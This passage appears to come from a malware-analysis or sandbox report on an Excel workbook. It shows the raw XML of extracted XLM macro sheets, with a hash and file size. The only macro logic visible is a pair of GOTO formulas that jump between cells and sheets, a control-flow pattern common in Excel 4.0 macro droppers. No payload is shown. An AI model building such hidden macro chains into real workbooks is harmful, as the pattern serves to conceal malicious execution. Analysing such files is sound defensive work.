spans="8:10" x14ac:dyDescent="0.25"><c r="H21" s="2" t="e"><f>GOTO(J12)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_11.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 1444 bytes
SHA-256: c864e46dd2993cb0c35598f439eafb273f10f51735f3c7b483f181003f59a4e7
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{DE64437D-E81C-46EE-855D-0EAFB901A6FF}"><dimension ref="A11"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="9.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="1" width="9.5703125" style="2" bestFit="1" customWidth="1"/><col min="2" max="16384" width="9.28515625" style="2"/></cols><sheetData><row r="11" spans="1:1" x14ac:dyDescent="0.25"><c r="A11" s="2" t="e"><f>GOTO(now!G8)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>